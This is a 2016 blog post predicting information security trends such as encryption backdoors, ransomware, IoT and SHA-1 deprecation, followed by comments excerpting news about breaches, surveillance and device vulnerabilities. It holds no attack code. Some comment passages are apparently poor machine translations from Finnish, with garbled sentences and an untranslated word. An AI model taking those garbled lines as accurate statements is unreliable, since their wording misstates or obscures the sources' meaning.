Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was bad for information security was pretty, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there was Airplanes hacked, cars hacked, vulnerabilities in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and in the identification of target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have impact on what comes in 2016: New EU data protection legislation package approved and EU Court of Justice decision in which it noted the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under the Safe Harbor violation of law – you need some other agreement for this. The situation for this will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After huge amount of user information leaks in 2015 from all kinds of Internet services, there will the challenges for cloud companies to gain trust in their security. You might have just dared to trust “the right cloud services,” since in principle the traditional information security point of view, they seem to be the main things okay, rising this privacy issues raised.
New environments will bring new threats. New operating systems versions means that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important important in 2016 as 5G networks will be critical infrastructure, on top of which for example. transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem in revelations as all other news coverage is the exponential growth of knowledge. There are variety of news summaries produced a daily basis, but they are not enough to get good picture of what is happening. There are bigger and smaller news, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old way network security focused on perimeter defense is not enough in 2016. Old mantras “encrypt everything” and “secure the perimeter,” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: If you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to public key infrastructure lock-and-key system you will need also an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans to various kinds of breaches – with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 Law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes.Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials to demand such thing with varying success on different countries. Another fact is that The existence of coded communications is a reality and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: Encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access to government – ie, a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals - Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. The poorly thought-out and crude surveillance technique could have a devastating effect on the country’s internet security- as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users install state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for early SHA-1 crypto cutoff that can happen in 2016 instead of earlier planned Jan 1st, 2017. Due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start display errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates in the end of 2016.
The use of Blockchain technology, permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with Linux Foundation.
The use of disk encryption will increase and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or loose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security neeeds. The disadvantage of this approach is that Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak leaking passwords are still huge security problem still in 2016. Passwords are often the weakest parts when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering in a code sent via text method to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.
Google begins testing login system that uses phone notifications for authentication instead of passwords: authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
Smart phone will become more and more security critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example US Navy is using obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.
Cars were hacked at record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars, hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms – not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe, either, as they are built using largerly same too often vulnerable technologies as other IoT system. IoT security is still in in infancy in 2016.
Cyber criminals have become more active in 2015 particularly in the malicious the ransom fabrications. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily and Exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware I recommend to ensure IT Support or your service provider the data back-up and restoring procedure operational, practiced and tested. You can need it in 2016 to get your data back without considering paying to criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016 and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom to DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. Ransomware Is Coming to Medical Devices article tells that according to a report released recently week by Forrester Research the number one cybersecurity prediction for 2016: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will be hacked. In 2016 If You’re Not Paranoid, You’re Crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have solution for that.
2,232 Comments
Tomi Engdahl says:
Jacob Kastrenakes / The Verge:
BuzzFeed hacked by hacker group OurMine after publishing story identifying a member; group alters articles, claimed to have seized database, threatens release
BuzzFeed vandalized by hacking group after exposing alleged member
http://www.theverge.com/2016/10/5/13172430/buzzfeed-hacked-by-ourmine-after-exposing-member
A number of BuzzFeed posts were vandalized by hackers this morning in apparent retaliation for a story that claimed to expose a member of their group. The hacking group, which goes by OurMine, changed the titles of several BuzzFeed posts to read “Hacked by OurMine” and replaced the body of some stories with a note not to “share fake news about us again.”
The hackers also claimed to have BuzzFeed’s “database” and threatened to publish it.
The hack comes the morning after BuzzFeed ran a story on OurMine, identifying a teenager who appeared to be a member of the group.
OurMine has taken responsibility for a number of prominent social media hacks in recent months, including taking control of accounts from the CEOs of Facebook, Google, and Twitter. It also broke into Variety’s website earlier this year
Tomi Engdahl says:
Google becomes the dreaded Big Brother
Google Assistant. It has been more sophisticated, utilizing artificial intelligence sidekick
- The smartphone has become the remote controls of our lives. But over the next ten years, a census (computing) will be used universally everywhere, Pichai painted.
The role of Google Assistant here is to act as a natural conversation between you and Google.
Google Assistant is intended to operate in all possible devices to the office and the car from the smartphone to the TV. Starting from Pixel and Pixel XL smart phones. It works as Siri, but has access to all Google knows about you and everything else.
These ‘big brother’ has been previously described in science fiction literature.
Source: http://etn.fi/index.php?option=com_content&view=article&id=5163:googlesta-tulee-pelatty-isoveli&catid=13&Itemid=101
Tomi Engdahl says:
New York Times:
Government official: Yahoo got FISA order to scan incoming email for terrorist digital signature, used existing spam filtering, no longer collecting this data — Yahoo was ordered last year to search incoming emails for the digital “signature” of a communications method used by a state-sponsored …
Yahoo Said to Have Aided U.S. Email Surveillance by Adapting Spam Filter
http://www.nytimes.com/2016/10/06/technology/yahoo-email-tech-companies-government-investigations.html
Tomi Engdahl says:
Jim Finkle / Reuters:
Johnson & Johnson warns of vulnerability in insulin pumps used by 114K people across USA and Canada that could cause overdose if exploited; issues workarounds
J&J warns diabetic patients: Insulin pump vulnerable to hacking
http://www.reuters.com/article/us-johnson-johnson-cyber-insulin-pumps-e-idUSKCN12411L
Johnson & Johnson is telling patients that it has learned of a security vulnerability in one of its insulin pumps that a hacker could exploit to overdose diabetic patients with insulin, though it describes the risk as low.
Medical device experts said they believe it was the first time a manufacturer had issued such a warning to patients about a cyber vulnerability, a hot topic in the industry following revelations last month about possible bugs in pacemakers and defibrillators.
“The probability of unauthorized access to the OneTouch Ping system is extremely low,” the company said in letters sent on Monday to doctors and about 114,000 patients who use the device in the United States and Canada.
“It would require technical expertise, sophisticated equipment and proximity to the pump, as the OneTouch Ping system is not connected to the internet or to any external network.”
The system is vulnerable because those communications are not encrypted, or scrambled, to prevent hackers from gaining access to the device, said Radcliffe, who reported vulnerabilities in the pump to J&J in April and published them on the Rapid7 blog on Tuesday.
R7-2016-07: Multiple Vulnerabilities in Animas OneTouch Ping Insulin Pump
https://community.rapid7.com/community/infosec/blog/2016/10/04/r7-2016-07-multiple-vulnerabilities-in-animas-onetouch-ping-insulin-pump
Today we are announcing three vulnerabilities in the Animas OneTouch Ping insulin pump system, a popular pump with a blood glucose meter that services as a remote control via RF communication. Before we get into the technical details, we want to flag that we believe the risk of wide scale exploitation of these insulin pump vulnerabilities is relatively low, and we don’t believe this is cause for panic. We recommend that users of the devices consult their healthcare providers before making major decisions regarding the use of these devices. More on that further down in this post.
These issues have been reported to the vendor, Animas Corporation, CERT/CC, the FDA and DHS.
Three major findings were discovered during the analysis of the product.
R7-2016-07.1: Communications transmitted in cleartext (CVE-2016-5084)
R7-2016-07.2: Weak pairing between remote and pump (CVE-2016-5085)
R7-2016-07.3: Lack of replay attack prevention or transmission assurance (CVE-2016-5086)
The OneTouch Ping does not communicate on 802.11 WiFi, or otherwise communicate on the internet. However, it is believed these attacks could be performed from one to two kilometers away, if not substantially further, using sufficient elevation and off-the-shelf radio transmission gear available to ham radio hobbyists.
While the normal use case between the remote and pump is approximately 10 meters. In 2011, Barnaby Jack of McAfee, Inc. claimed an ability to perform a 900mHz band attack from 90 meters away with an external directional antenna (a commercial 3 element yagi), however he did not execute this attack against the OneTouch Ping.
Using industry standard encryption with a unique key pair would mitigate these issues.
Affected users can avoid these issues entirely by disabling the radio (RF) functionality of the device.
Tomi Engdahl says:
New York Times:
Signal received a federal subpoena with gag order in first half of this year demanding IP addresses, browsing histories, and more, but it could hand over little
Subpoenas and Gag Orders Show Government Overreach, Tech Companies Argue
http://www.nytimes.com/2016/10/05/technology/subpoenas-and-gag-orders-show-government-overreach-tech-companies-argue.html
It has been six months since the Justice Department backed off on demands that Apple help the F.B.I. break the security of a locked iPhone.
But the government has not given up the fight with the tech industry. Open Whisper Systems, a maker of a widely used encryption app called Signal, received a subpoena in the first half of the year for subscriber information and other details associated with two phone numbers that came up in a federal grand jury investigation in Virginia.
The subpoena arrived with a court order that said Open Whisper Systems was not allowed to tell anyone about the information request for one year.
Technology companies contend that court-imposed gag orders are being used too often by law enforcement and that they violate the Bill of Rights.
Justice Department officials, for their part, argue that these gag orders are necessary to protect developing cases and to avoid tipping off potential targets. The officials say that they are simply following leads where they take them.
The information request made of Open Whisper Systems is particularly sensitive, since its encryption app is used around the world, and it is often recommended to journalists and human rights activists.
“The Signal service was designed to minimize the data we retain,” said Moxie Marlinspike, the founder of Open Whisper Systems. Mr. Marlinspike said Signal uses a technology called end-to-end encryption that kept the service from gaining access to the contents of its users’ messages. The company also does not store information on those with whom its users are communicating.
In other circumstances, the government has tried to force companies via court order to re-engineer their services to collect missing pieces of information, as it did with Apple earlier this year and in a similar case in 2013 against Lavabit, a small encrypted messaging service used by the former defense contractor Edward J. Snowden.
The government did not make that request of Open Whisper Systems. “They need to pick those cases carefully,” Ms. Granick said. “They are only picking cases where they think they’re going to have the people on their side.”
Tomi Engdahl says:
New York Times:
US government officially blames Russia for hacking Democratic National Committee to “interfere with the US election process” — WASHINGTON — The Obama administration on Friday formally accused the Russian government of stealing and disclosing emails from the Democratic National Committee …
U.S. Says Russia Directed Hacks to Influence Elections
http://www.nytimes.com/2016/10/08/us/politics/us-formally-accuses-russia-of-stealing-dnc-emails.html
The Obama administration on Friday formally accused the Russian government of stealing and disclosing emails from the Democratic National Committee and a range of other institutions and prominent individuals, immediately raising the issue of whether President Obama would seek sanctions or other retaliation.
In a statement from the director of national intelligence, James R. Clapper Jr., and the Department of Homeland Security, the government said the leaked emails that have appeared on a variety of websites “are intended to interfere with the U.S. election process.”
Tomi Engdahl says:
Lorenzo Franceschi-Bicchierai / Motherboard:
Source: email scanner installed after government order was not a modified spam filter; Yahoo’s security team thought it was a rootkit when they discovered it — The spy tool that the US government ordered Yahoo to install on its systems last year at the behest of the NSA or the FBI was a …
Yahoo’s Government Email Scanner Was Actually a Secret Hacking Tool
http://motherboard.vice.com/read/yahoo-government-email-scanner-was-actually-a-secret-hacking-tool
The spy tool that the US government ordered Yahoo to install on its systems last year at the behest of the NSA or the FBI was a “poorly designed” and “buggy” piece of malware, according to two sources closely familiar with the matter.
Last year, the US government served Yahoo with a secret order, asking the company to search within its users’ emails for some targeted information, as first reported by Reuters this week.
Anonymous sources told The Times that the tool was nothing more than a modified version of Yahoo’s existing scanning system, which searches all email for malware, spam and images of child pornography.
But two sources familiar with the matter told Motherboard that this description is wrong, and that the tool was actually more like a “rootkit,” a powerful type of malware that lives deep inside an infected system and gives hackers essentially unfettered access.
The rootkit-like tool was found by Yahoo’s internal security testing team during one of their checkups, according to a source.
“They assumed it was a rootkit installed by hackers,”
After the Yahoo security team discovered the spy tool and opened a high severity security issues within an internal tracking system, according to the source, the warning moved up the ranks. But when the head of security at the time, Alex Stamos, found out it was installed on purpose, he spoke with management; afterward, “somehow they covered it up and closed the issue fast enough that most of the [security] team didn’t find out,“ the source said.
In other words, the incident was an “extremely well kept” secret, the source said.
Tomi Engdahl says:
Thanks To Encryption, Governments Need Companies Like Yahoo To Spy on Users
http://motherboard.vice.com/read/thanks-to-encryption-governments-need-companies-like-yahoo-to-spy-on-users?trk_source=recommended
Last year, the US government asked Yahoo to scan all its customers emails to look for the digital “signature” of certain method of communication used by a terrorist group.
The secret scanning tool rocked the tech world and that of privacy and anti-surveillance activists this week, shocked by how broad the request was, and the fact that it had kept under wraps. Until Reuters reported its existence this week
In an age where the FBI asked Apple to unlock the iPhone of a dead terrorist, and countless top secret documents revealed the vast surveillance powers of the NSA, asking Yahoo to use a scanning tool that former employees defined as a “buggy” and a “poorly designed” “backdoor” or “rootkit,” was an unusual request as it wasn’t targeted—Yahoo was essentially looking through the whole haystack looking for a few needles—and the company apparently didn’t fight back.
But such a request is a perfect example of how the rise of encryption technologies have changed the face of government surveillance. Before large tech companies such as Google and Yahoo turned on default encryption across their services, including email—in the process protecting their customers data as it travelled from their computers to the company’s servers, as well as when the data travelled through the internet—the NSA could’ve gone through users’ data without having to knock on Yahoo’s door.
As revealed by documents leaked by Edward Snowden, the NSA and its British partner GCHQ have taps on the internet backbone infrastructure, and used to collect data directly from what they called “upstream” provides, none other than large ISPs. Before the Snowden revelations, when companies such as Microsoft, Yahoo, and other email providers didn’t use encryption, all these emails were travelling in the clear over the internet, and were collected by spy agencies.
Especially in the aftermath of the Snowden leaks, companies started adopting HTTPS
Gmail and other providers were encrypted. The number rose to 58 percent in 2014, when major providers like Yahoo and Microsoft also adopted STARTTLS. Now, it’s almost pervasive, at more than 80 percent.
“Every time a provider turns on STARTTLS the NSA loses access to more and more email,” Soghoian told me. “NSA has lost a good percentage of its visibility into international email traffic without the help of tech companies.”
Tomi Engdahl says:
How France’s TV5 was almost destroyed by ‘Russian hackers’
http://www.bbc.com/news/technology-37590375
A powerful cyber-attack came close to destroying a French TV network, its director-general has told the BBC.
TV5Monde was taken off air in April 2015. A group calling itself the Cyber Caliphate, linked to so-called Islamic State, first claimed responsibility.
But an investigation now suggests the attack was in fact carried out by a group of Russian hackers.
The attack used highly targeted malicious software to destroy the TV network’s systems.
Wednesday 8 April
just launched its latest channel.
Just as they were being served their appetisers at 20:40 local time, a flood of texts and calls informed him that all 12 channels had gone off air.
“It’s the worst thing that can happen to you in television,”
It quickly became clear that the network had been subject to a serious cyber-attack.
“We were a couple of hours from having the whole station gone for good.”
It was a race against time – more systems were corrupted with every passing minute. Any substantial delay would have led satellite distribution channels to cancel their contracts, placing the entire company in jeopardy.
“We were saved from total destruction by the fact we had launched the channel that day and the technicians were there,”
At 05:25 local time, one channel was restored. Others followed later that morning.
The attack was far more sophisticated and targeted than reported at the time. The perpetrators had first penetrated the network on 23 January.
They carried out reconnaissance of TV5Monde to understand the way in which it broadcast its signals. They then fabricated bespoke malicious software to corrupt and destroy the internet-connected hardware that controlled the TV station’s operations – such as the encoder systems used to transmit programmes.
The attackers used seven different points of entry. Not all of them were part of TV5Monde or in France.
The investigators had come to believe that the attackers had used the jihadist posts to try to cover their tracks.
Mr Bigot was later told evidence had been found that his network had been attacked by a group of Russian hackers, who are known as APT 28.
He explained that the investigators had only been able to prove two things.
Firstly, that the attack was designed to destroy the channel, and secondly, that it was linked to APT 28.
Tomi Engdahl says:
Destructive intent
It’s not uncommon for cyber-attackers to enter a target’s network to look for information.
But what happened to TV5 was not espionage – the aim was destruction. And that is indicative of a new trend: attacks with physical-world consequences.
Arguably, the pioneering state-backed attack of this type was Stuxnet.
More recently, a power station in Ukraine was switched off by cyber-attackers.
The TV5 attack fits into this pattern of highly-targeted attacks, rather than the kind of general criminal activity typically seen on the web.
Dangerous precedent
The impact on TV5 was enormous.
In the immediate aftermath, staff had to return to using fax machines as they could not send emails.
“We had to wait for months and months before we reconnected to the internet,”
The financial cost was €5m ($5.6m; £4.5m) in the first year, followed by over €3m (£3.4m; £2.7m) every following year for new protection.
But the biggest challenge has been to the way the company works. Every employee has had to change their behaviour.
Special authentication procedures are needed to check email from abroad, flash drives have to be tested before being inserted.
“We never will be as we were before,” said Mr Bigot. “It is too dangerous.”
Source: http://www.bbc.com/news/technology-37590375
Tomi Engdahl says:
Be wary of: the Internet war is being fought on a daily basis
Internet history is a noble and academic. After the military starting points of our fathers internet was especially universities and research centers of communication bus. The first data on the waves surfing just academics also in Finland. Subsequent development is not as sublime.
At the same time when the Internet hit the web itself through earnest, Bill Clinton’s vice president, Al Gore had served as the cover image of the Information Super Highway project, the center of which was a matter of information and use of the information. The whole world was excited about the network of networks, which is promised to the world all the knowledge within the reach of every human being.
When we fast forward 20 years period, the visions have been realized. All knowledge of the world is indeed available to us. Unlike before, the data is also with us. Smart Devices will allow us to access the world’s data storage everywhere
At the same time, the technology has developed at a furious pace, academicians have left the network user groups to a small minority. The masses have discovered a network of knowledge and the ideal is buried below commercialism and entertainment.
Today’s network is full of semi-information: It is a breeding ground for conspiracy theories, hoaxes, misrepresentation of information, propaganda and different impact on businesses. Instead, the information people share each other’s beliefs.
The distribution of peer-reviewed scientific publication so not accumulate likes: the inflation data favors entertainment.
The most significant part of the nonsense due to ignorance of users. Much more dangerous is the phenomenon of information warfare and affecting users thinking, where state actors using the network professionally propaganda distribution channel as well as a tool to obscure reality. The phenomenon is not new, but its volume has grown at a furious pace.
Each of us are victims of information warfare on a daily basis.
The most significant change is a problem in getting used to a new normal. In principle, most of us assume that the commentaries made a Facebook account in the tabloid news is given in good faith, and the online publication of news is done in accordance with the way of, for example, with regard to revision of the source of good journalistic information. We find it difficult to understand that the entire network media can be set up to share information due to obsolete and comments may write a monthly salary received.
Although everyone has heard the warnings of information warfare operations, governmental Internet troll factories and deliberate influencing opinion, the application of information network everyday situations is difficult.
English philosopher Thomas Hobbes formulated in his social Philosophy the concept of human natural state, where before there is a war of all social structures in the formation of all against all. The concept of who lived three hundred years ago thinker describes frighteningly well the current state of the Internet.
In network society in building readiness and ability to source criticism consist is extremely important. Understanding the value of information and harmfulness of misinformation is at the individual level is also important at the level of society as a whole.
Source: http://www.tivi.fi/blogit/ole-varuillasi-netissa-sotaa-kaydaan-paivittain-6589252
Tomi Engdahl says:
Spotify ads slipped malware onto PCs and Macs
New Spotify subscriber perk: No malware.
http://www.techhive.com/article/3128289/security/spotify-ads-slipped-malware-onto-pcs-and-macs.html
Spotify’s ads crossed from nuisance over to outright nasty this week, after the music service’s advertising started serving up malware to users on Wednesday. The malware was able to automatically launch browser tabs on Windows and Mac PCs, according to complaints that surfaced online.
As is typical for this kind of malware, the ads directed users’ browsers to other malware-containing sites in the hopes that someone would be duped into downloading more malicious software. The “malvertising” attack didn’t last long as Spotify was able to quickly correct the problem.
Spotify’s hardly the first tech company to get hit with malware in its ads. Google uncovered malware-loaded ads from an advertising partner in April 2015, and several days before that Yahoo announced it had removed malware from its advertising network.
you should also scan your PC with an anti-malware program such as Malwarebytes
https://www.malwarebytes.com/mwb-download/
Tomi Engdahl says:
Stickers emerge as EU’s weapon against dud IoT security
Whitegoods-inspired security rating scheme under discussion
http://www.theregister.co.uk/2016/10/10/eu_commission_preps_iot_security_privacy_rules/
The European Commission is readying a push to get companies to produce labels that reveal the security baked into internet-of-things things.
The labelling effort is part of a broader push to drive companies to better handle security controls and privacy data in the notoriously insecure and leaky devices.
Deputy head of cabinet Thibault Kleiner told Euractiv the Commission may push companies to develop labelling for secure internet-of-things devices.
The stickers plan is modelled on labels applied to white goods and other domestic appliances, as consumers apparently understand this kind of labelling.
The risk posed by sloppily-secured things was demonstrated neatly by a recent DDoS attack, rated the world’s largest to date, which emerged from a large internet of things botnet.
Commission plans cybersecurity rules for internet-connected machines
http://www.euractiv.com/section/innovation-industry/news/commission-plans-cybersecurity-rules-for-internet-connected-machines/
The European Commission is getting ready to propose new legislation to protect machines from cybersecurity breaches, signalling the executive’s growing interest in encouraging traditional European manufacturers to build more devices that are connected to the internet.
A new plan to overhaul EU telecoms law, which digital policy chiefs Günther Oettinger and Andrus Ansip presented three weeks ago, aims to speed up internet connections to meet the needs of big industries like car manufacturing and agriculture as they gradually use more internet functions.
But that transition to more and faster internet connections has caused many companies to worry that new products and industrial tools that rely on the internet will be more vulnerable to attacks from hackers.
EU lawmakers want to dispel those fears by creating rules that force companies to meet tough security standards and go through multi-pronged certification processes to guarantee privacy.
“That’s really a problem in the internet of things. It’s not enough to just look at one component. You need to look at the network, the cloud. You need a governance framework to get certification,”
Kleiner said the Commission would encourage companies to come up with a labelling system for internet-connected devices that are approved and secure.
There are currently around 6 billion internet-connected devices in use worldwide, and that figure is predicted to soar to over 20 billion by 2020, according to research by consultancy Gartner.
The internet of things is a catchphrase that has caught on with Brussels legislators and lobbyists, who use it to describe devices that haven’t used internet connection up until now—but will in the future, like connected cars that predict traffic or calculate ways to save fuel, or refrigerators that alert a person when they’re running out of food.
The EU labelling system that rates appliances based on how much energy they consume could be a template for the cybersecurity ratings: Kleiner pointed to that as “something I’d apply to the internet of things”.
Some hardware manufacturers are sceptical of the Commission’s plans to require certification for different parts of internet-connected devices and instead want hardware like SIM cards to be approved as security guarantees that can be used with appliances, Kleiner acknowledged.
Tomi Engdahl says:
Security bod to MSFT: PowerShell’s admin-lite scheme is an open door
Too much admin turns out to be barely enough
http://www.theregister.co.uk/2016/10/10/security_bod_to_microsoft_your_powershell_jea_feature_isnt_a_barrier_its_an_open_door/
Microsoft’s PowerShell feature “Just Enough Administration” (JEA) is, apparently, “way too much administration” according to researcher Matt Weeks.
In this write-up of JEA, root9B and Metasploit module developer Weeks says JEA profiles aren’t much of a barrier, since people with JEA profiles can escalate themselves to sysadmin status.
The idea with JEA is to provide granular administrative profile management – a good thing, if only it worked out that way.
By way of demonstration, Weeks provides a variety of examples in which capabilities in JEA are exploitable.
Weeks says Microsoft has promised to update its JEA documentation, making it clear that people with JEA profiles should be managed as closely as anybody else with administrative access.
Tomi Engdahl says:
Crypto needs more transparency, researchers warn
Publish primes with seeds, so we know there are no backdoors
http://www.theregister.co.uk/2016/10/09/crypto_needs_more_transparency_researchers_warn/
Researchers with at the French Institute for Research in Computer Science and Automation (INRIA) and the University of Pennsylvania have called for security standards-setters to publish the seeds for the prime numbers on which their standards rely.
The boffins also demonstrated again that 1,024-bit primes can no longer be considered secure, by publishing an attack using “special number field sieve” (SNFS) mathematics to show that an attacker could create a prime that looks secure, but isn’t.
Since the research is bound to get conspiracists over-excited, it’s worth noting: their paper doesn’t claim that any of the cryptographic primes it mentions have been back-doored, only that they can no longer be considered secure.
“There are opaque, standardised 1024-bit and 2048-bit primes in wide use today that cannot be properly verified”, the paper states.
They call for 2,048-bit keys to be based on “standardised primes” using published seeds, because too many crypto schemes don’t provide any way to verify that the seeds aren’t somehow back-doored.
Examples of re-used primes in the paper include:
Many TLS implementations use some form of default, and as a result, “in May 2015, 56 per cent of HTTPS hosts selected one of the 10 most common 1024-bit groups when negotiating ephemeral Diffie-Hellman key exchange”;
In IPSec, “66 per cent of IKE responder hosts preferred the 1024-bit Oakley Group 2 over other choices” for their Diffie-Hellman exchange; and
OpenSSH implementations favour “a pre-generated list that is generally shipped with the software package”.
If any of the “hard-coded” primes were maliciously produced – something that’s happened before, for those who remember RSA’s NSA-funded Dual EC Deterministic Random Bit Generator – it would be hard to spot by looking at the numbers, but factorisation would be feasible.
Cryptology ePrint Archive: Report 2016/961
A kilobit hidden SNFS discrete logarithm computation
http://eprint.iacr.org/2016/961
Tomi Engdahl says:
CIA sees five days into the future
The US Central Intelligence Agency to take advantage of a wide range of information technology solutions in their work. Massive data processing capacity by utilizing the CIA kykeneekin predict the things taking place in the real world for several days in advance. The matter told Defenseone-website.
Department predicts algorithms and analytics to smuggling and extremists activities. Machine Learning allows both public and CIA’s own secret information extracted from databases are combined suitably. As a result, the CIA is able to predict the outbreak of social unrest for up to five days before the actual events.
